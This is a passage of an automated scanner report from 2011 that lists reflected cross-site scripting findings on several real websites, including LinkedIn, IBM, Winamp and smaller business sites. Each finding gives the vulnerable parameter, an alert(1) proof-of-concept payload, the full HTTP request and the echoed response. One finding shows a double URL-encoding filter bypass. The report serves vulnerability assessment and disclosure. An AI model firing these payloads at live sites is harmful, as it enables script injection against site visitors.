HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:20:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3) Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-Control: private Set-Cookie: PHPSESSID=tn6mr2tkpg Vary: User-Agent,Accept Content-Type: text/html Content-Length: 32741 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <head> <meta http-equiv="C ...[SNIP]... <form method="post" id="RegistrationQForm" action="/top-10-web ...[SNIP]... |
3.52. http://www.business-software.com/top-10-web-content-management-vendors.php [keyword parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.business |
Path: | /top-10-web-content |
Issue detail
The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31949"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:20:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3) Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-Control: private Set-Cookie: PHPSESSID=tf092k3rbi Vary: User-Agent,Accept Content-Type: text/html Content-Length: 32741 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <head> <meta http-equiv="C ...[SNIP]... <form method="post" id="RegistrationQForm" action="/top-10-web ...[SNIP]... |
3.53. http://www.business-software.com/top-10-web-content-management-vendors.php [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.business |
Path: | /top-10-web-content |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4664"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:20:29 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3) Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-Control: private Set-Cookie: PHPSESSID=56tm98dg8f Vary: User-Agent,Accept Content-Type: text/html Content-Length: 32744 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <head> <meta http-equiv="C ...[SNIP]... <form method="post" id="RegistrationQForm" action="/top-10-web ...[SNIP]... |
3.54. http://www.business-software.com/top-10-web-content-management-vendors.php [track parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.business |
Path: | /top-10-web-content |
Issue detail
The value of the track request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8831c"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:19:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3) Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-Control: private Set-Cookie: PHPSESSID=cbc0c1flt6 Vary: User-Agent,Accept Content-Type: text/html Content-Length: 32741 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <head> <meta http-equiv="C ...[SNIP]... <form method="post" id="RegistrationQForm" action="/top-10-web ...[SNIP]... |
3.55. http://www.business-software.com/top-10-web-content-management-vendors.php [traffic parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.business |
Path: | /top-10-web-content |
Issue detail
The value of the traffic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c411b"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:20:06 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3) Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-Control: private Set-Cookie: PHPSESSID=3csq33e05p Vary: User-Agent,Accept Content-Type: text/html Content-Length: 32741 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <head> <meta http-equiv="C ...[SNIP]... <form method="post" id="RegistrationQForm" action="/top-10-web ...[SNIP]... |
3.56. http://www.linkedin.com/cws/share-count [url parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.linkedin.com |
Path: | /cws/share-count |
Issue detail
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload bf915<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cws/share-count?url=http Host: www.linkedin.com Proxy-Connection: keep-alive Referer: http://www.project Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID="ajax P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: visit=G; Expires=Fri, 17-Mar-2079 05:34:40 GMT; Path=/ Set-Cookie: bcookie="v=1&b9beeacf Vary: Accept-Encoding Content-Type: text/javascript;charset Content-Language: en-US Date: Sun, 27 Feb 2011 02:20:33 GMT Content-Length: 151 IN.Tags.Share.handleCount |
3.57. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [bean parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /_cs_apps/ajaxProxy.cfm |
Issue detail
The value of the bean request parameter is copied into the HTML document as plain text between tags. The payload 7e534<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /_cs_apps/ajaxProxy.cfm Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:16:29 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Pragma: no-cache Expires: {ts '2011-02-26 18:16:29'} Content-Type: text/html; charset=UTF-8 Content-Length: 1638 <script type="text/javascript" src="/ADF/thirdParty <!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:29'} --> <script type='text/javascript' s ...[SNIP]... </script> The Bean: twitterService7e534<img src=a onerror=alert(1) |
3.58. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [method parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /_cs_apps/ajaxProxy.cfm |
Issue detail
The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 998c7<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /_cs_apps/ajaxProxy.cfm Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:16:36 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Pragma: no-cache Expires: {ts '2011-02-26 18:16:36'} Content-Type: text/html; charset=UTF-8 Content-Length: 1638 <script type="text/javascript" src="/ADF/thirdParty <!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:36'} --> <script type='text/javascript' s ...[SNIP]... </script> The Bean: twitterService with method: buildUtilityTweetHTML998c7<img src=a onerror=alert(1) |
3.59. http://www.prchecker.info/check_page_rank.php [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.prchecker.info |
Path: | /check_page_rank.php |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27f50"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /check_page_rank.php/27f50"><script>alert(1)< Host: www.prchecker.info Proxy-Connection: keep-alive Referer: http://www.prchecker.info Cache-Control: max-age=0 Origin: http://www.prchecker.info Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=d8830cccd5 |
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:34:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 27444 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <title> ...[SNIP]... <form action="/check_page_rank ...[SNIP]... |
3.60. http://www.prchecker.info/check_page_rank.php [urlo parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.prchecker.info |
Path: | /check_page_rank.php |
Issue detail
The value of the urlo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82917"%20style%3dxThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /check_page_rank.php Host: www.prchecker.info Proxy-Connection: keep-alive Referer: http://www.prchecker.info Cache-Control: max-age=0 Origin: http://www.prchecker.info Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=d8830cccd5 |
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:34:45 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 27543 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <title> ...[SNIP]... <input type="text" value="http://cloudscan ...[SNIP]... |
3.61. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.sti-cs.com |
Path: | /Portfolio/Trades-and |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8e9b%253c%252fscriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /Portfolio/Trades-and Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581 |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:55 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14545 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title> <script type="text/javascript" language="javascript ...[SNIP]... s.com/admin/imageproject portfolio25[1][1]='Awards Logo design'; portfolio25[1][2]='22940b portfolio25[1][3]='229'; portfolio25[1][4]='25'; var CurrentPageId='24c8e9b</script><script </script> ...[SNIP]... |
3.62. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.sti-cs.com |
Path: | /Portfolio/Trades-and |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98f92%253c%252fscriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /Portfolio/Trades-and Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581 |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:19:02 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14545 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title> <script type="text/javascript" language="javascript ...[SNIP]... s.com/admin/imageproject portfolio25[1][1]='Awards Logo design'; portfolio25[1][2]='22940b portfolio25[1][3]='229'; portfolio25[1][4]='25'; var CurrentPageId='2598f92</script><script </script> ...[SNIP]... |
3.63. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.sti-cs.com |
Path: | /Portfolio/Trades-and |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e625%253c%252fscriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /Portfolio/Trades-and Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581 |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:51 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14544 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title> <script type="text/javascript" language="javascript ...[SNIP]... cs.com/admin/imageproject portfolio25[1][1]='Awards Logo design'; portfolio25[1][2]='22940b portfolio25[1][3]='229'; portfolio25[1][4]='25'; var CurrentPageId='74e625</script><script </script> ...[SNIP]... |
3.64. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.watchmouse.com |
Path: | /assets/css/print.css |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 291e9'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /assets/css/print.css291e9'-alert(1)- Host: www.watchmouse.com Proxy-Connection: keep-alive Referer: http://www.watchmouse.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:37:31 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-23e31667bc72ad Content-Language: en P3P: policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 13816 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173 var serverRef = encodeURIComponent('http: if(document && document.referrer){ jsRef = encodeURIComponent }else{ jsRef = ''; ...[SNIP]... |
3.65. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.watchmouse.com |
Path: | /assets/css/screen.css |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adcd'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /assets/css/screen.css8adcd'-alert(1)- Host: www.watchmouse.com Proxy-Connection: keep-alive Referer: http://www.watchmouse.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:37:32 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-b162fa23d063ab Content-Language: en P3P: policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 13826 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173 var serverRef = encodeURIComponent('http: if(document && document.referrer){ jsRef = encodeURIComponent }else{ jsRef = ''; ...[SNIP]... |
3.66. http://www.watchmouse.com/en/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.watchmouse.com |
Path: | /en/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c623'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en3c623'-alert(1)- Host: www.watchmouse.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:36:45 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-014c46aed482ac Content-Language: en P3P: policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 13508 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173 var serverRef = encodeURIComponent(''); if(document && document.referrer){ jsRef = encodeURIComponent }else{ jsRef = ''; } requestParams = 'vjsRef='+jsRef ...[SNIP]... |
3.67. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.watchmouse.com |
Path: | /en/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41203'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/?41203'-alert(1)- Host: www.watchmouse.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:36:29 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-fff3e345c354e4 Content-Language: en P3P: policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 18498 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173 var serverRef = encodeURIComponent(''); if(document && document.referrer){ jsRef = encodeURIComponent }else{ jsRef = ''; } requestParams = 'vjsRef='+jsR ...[SNIP]... |
3.68. http://www.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.watchmouse.com |
Path: | /en/api/checkreferrer.php |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0d30'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/api/checkreferrer.phpa0d30'-alert(1)- Host: www.watchmouse.com Proxy-Connection: keep-alive Referer: http://www.watchmouse.com X-Requested-With: XMLHttpRequest Accept: text/html, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=165779128 |
Response
HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:37:20 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-f7f299238f15fb Content-Language: en P3P: policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 14505 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173 var serverRef = encodeURIComponent('http: if(document && document.referrer){ jsRef = encode ...[SNIP]... |
3.69. http://www.winamp.com/media-player/en [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://www.winamp.com |
Path: | /media-player/en |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c2b5"%3b5abe0529ac9 was submitted in the REST URL parameter 2. This input was echoed as 5c2b5";5abe0529ac9 in the application's response.This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /media-player/en5c2b5"%3b5abe0529ac9 HTTP/1.1 Host: www.winamp.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:45:19 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 46245 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... ryCode = "US"; var playerType = ""; var storeUrlGB = "http://shop.winamp.com var storeBundleUrlGB = "null"; var urlLang = "en5c2b5";5abe0529ac9", osDectect = "Windows 7", dispLanguage = "en-us" , pageType = "", winampplayerFull = "http://download.nullsoft ...[SNIP]... |
3.70. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ck parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://www14.software |
Path: | /webapp/iwm/web/signup.do |
Issue detail
The value of the ck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e233"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
